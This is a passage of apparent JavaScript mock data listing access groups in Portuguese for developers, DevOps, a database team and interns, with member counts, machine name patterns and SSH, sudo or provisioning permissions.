  { id: 'g2', name: 'Desenvolvedores', description: 'Acesso às máquinas de desenvolvimento', members: 8, machines: ['srv-dev*', 'ct-dev-*'], permissions: ['ssh', 'sudo'], color: 'blue' },
  { id: 'g3', name: 'DevOps', description: 'Produção e CI/CD', members: 4, machines: ['srv-web*', 'pve-cluster-*'], permissions: ['ssh', 'sudo', 'provisionar'], color: 'purple' },
  { id: 'g4', name: 'Database Team', description: 'Servidores de banco', members: 2, machines: ['srv-db*'], permissions: ['ssh'], color: 'emerald' },
  { id: 'g5', name: 'Estagiários', description: 'Ambiente sandbox', members: 5, machines: ['sandbox-*'], permissions: ['ssh'], color: 'amber' },
]
